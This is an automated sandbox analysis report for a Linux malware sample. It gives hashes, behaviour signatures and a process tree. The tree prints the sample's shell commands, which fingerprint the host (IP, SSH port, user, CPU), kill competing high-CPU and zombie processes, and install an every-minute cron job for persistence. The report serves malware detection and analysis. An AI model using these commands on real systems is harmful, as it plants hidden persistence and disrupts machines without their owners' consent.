Analysis
-
max time kernel
149s -
max time network
150s -
platform
ubuntu-20.04_amd64 -
resource
ubuntu2004-amd64-20240221-en -
resource tags
-
submitted
29-03-2024 06:11
General
-
Target
1a9a592cbc8e070bd8f16405b500a89e_JaffaCakes118
-
Size
2.4MB
-
MD5
1a9a592cbc8e070bd8f16405b500a89e
-
SHA1
564abeea31f50a896bef231d489e90007ecb8bbf
-
SHA256
c34523bce4a4730a1ce69a4ef0c961db845c43b17a8457b9e79c02914c1874de
-
SHA512
0ff1fb48af4f68a0c39aeeee75e726a19c208603d992a36bb6f799c2495c8134cf07fb218b2603c4ce2c2a608c5327b7cc5a33f48ac940026eec414defe69774
-
SSDEEP
49152:2pTV/bg+o8yNPRRciDPfB5H/bOKHixU9HDHoOZHt90j5bgDWbHM:1ccPZ5HDCAHDHoON0NOWbHM
Score
6/10
Malware Config
Signatures
-
Checks CPU configuration 1 TTPs 3 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Checks hardware identifiers (DMI) 1 TTPs 4 IoCs
Checks DMI information which indicate if the system is a virtual machine.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads CPU attributes 1 TTPs 6 IoCs
-
Reads hardware information 1 TTPs 14 IoCs
Accesses system info like serial numbers, manufacturer names etc.
-
Enumerates kernel/hardware configuration 1 TTPs 50 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/1a9a592cbc8e070bd8f16405b500a89e_JaffaCakes118/tmp/1a9a592cbc8e070bd8f16405b500a89e_JaffaCakes1181⤵
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
-
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \":\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵
-
/usr/bin/whoamiwhoami3⤵
-
/usr/bin/hostnamehostname3⤵
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵
-
/usr/bin/psps -A "-ostat,ppid"3⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵
-
/usr/bin/idid -u3⤵
-
/usr/bin/grepgrep -v grep3⤵
-
/usr/bin/grepgrep /etc/cron3⤵
-
/usr/bin/psps x3⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵
-
/usr/bin/idid -u3⤵
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"3⤵
-
/usr/bin/grepgrep -v /usr/sbin/httpd3⤵
-
/usr/bin/grepgrep -v -- "-bash[[:space:]]*\$"3⤵
-
/usr/bin/grepgrep -v grep3⤵
-
/usr/bin/psps aux3⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/shsh -c "dir=`pwd 2>/dev/null`;rm -rf \$dir/.cron 2>/dev/null;crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep -v '/tmp/1a9a592cbc8e070bd8f16405b500a89e_JaffaCakes118' 2>/dev/null > .cron 2>/dev/null;echo '* * * * * '\$dir/'/tmp/1a9a592cbc8e070bd8f16405b500a89e_JaffaCakes118' >> .cron 2>/dev/null; if [ \$(crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep '/tmp/1a9a592cbc8e070bd8f16405b500a89e_JaffaCakes118\$' 2>/dev/null | sort 2>/dev/null | uniq 2>/dev/null | wc -l 2>/dev/null) -eq '0' ]; then crontab \$dir/.cron 2>/dev/null; fi;rm -rf \$dir/.cron 2>/dev/null"2⤵
- Writes file to tmp directory
-
/usr/bin/rmrm -rf /tmp/.cron3⤵
-
/usr/bin/grepgrep -v /tmp/1a9a592cbc8e070bd8f16405b500a89e_JaffaCakes1183⤵
-
/usr/bin/grepgrep -v grep3⤵
-
/usr/bin/crontabcrontab -l3⤵
-
/usr/bin/crontabcrontab /tmp/.cron3⤵
- Creates/modifies Cron job
-
/usr/bin/rmrm -rf /tmp/.cron3⤵
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"2⤵
-
/usr/bin/idid -u3⤵
-
/usr/bin/hostnamehostname -I1⤵
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/usr/bin/catcat /etc/ssh/sshd_config1⤵
-
/usr/bin/grepgrep "Port "1⤵
-
/usr/bin/headhead -n 11⤵
-
/usr/bin/awkawk "{print \":\"\$2}"1⤵
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
-
/usr/bin/cutcut -d: -f21⤵
-
/usr/bin/sedsed -e "s/^ *//"1⤵
-
/usr/bin/sedsed -e "s/\$//"1⤵
-
/usr/bin/awkawk "{print \$1}"1⤵
-
/usr/bin/awkawk "{print \$4}"1⤵
-
/usr/bin/awkawk "{print \$4}"1⤵
-
/usr/bin/grepgrep "/tmp/1a9a592cbc8e070bd8f16405b500a89e_JaffaCakes118\$"1⤵
-
/usr/bin/sortsort1⤵
-
/usr/bin/uniquniq1⤵
-
/usr/bin/grepgrep -v grep1⤵
-
/usr/bin/wcwc -l1⤵
-
/usr/bin/crontabcrontab -l1⤵
-
/usr/bin/grepgrep -- "-bash[[:space:]]*\$"1⤵
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"1⤵
-
/usr/bin/wcwc -l1⤵
-
/usr/bin/grepgrep -v grep1⤵
-
/usr/bin/psps aux1⤵
- Reads CPU attributes
- Reads runtime system information
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
/tmp/.cronFilesize
67B
MD59ac8f1c69ea425eac34dbc5e7943f733
SHA188682cb8bc8d5522292310ecb2b2d7e6a0ebd90b
SHA25687f5356e801a0f8aa6b62a35640cf97c357241b8dbe7c57953aa06fea2bcdb3f
SHA512a1c6d3d4608d374b3a535b8836f200285fd682b68172c18a8b4959d906ff067d6a294ee83ebaf719f734b4fa7e06f11dfe456d465b9d6c463a78a80257db27db
-
/var/spool/cron/crontabs/tmp.HpXQ9dFilesize
251B
MD541989db46b2391945f78cc40bdb80661
SHA14dbc9d1f9260a50e71ee61bd7b8832832a26fd6b
SHA256c68bcf66d30802c1c80fd7fa601a320ac9b9de42b718e90b34d73a5b36a64d07
SHA51235bddd9de3845abbed90a6578917b5465bc24c3c717fb80bf71e023fe26fb1056e966ed2af78e60756c1159bcd29c4c7f4a082d1202d77b84d45d4100828c8aa
-
memory/1451-1-0x00007f9285881000-0x00007f9285ef2860-memory.dmp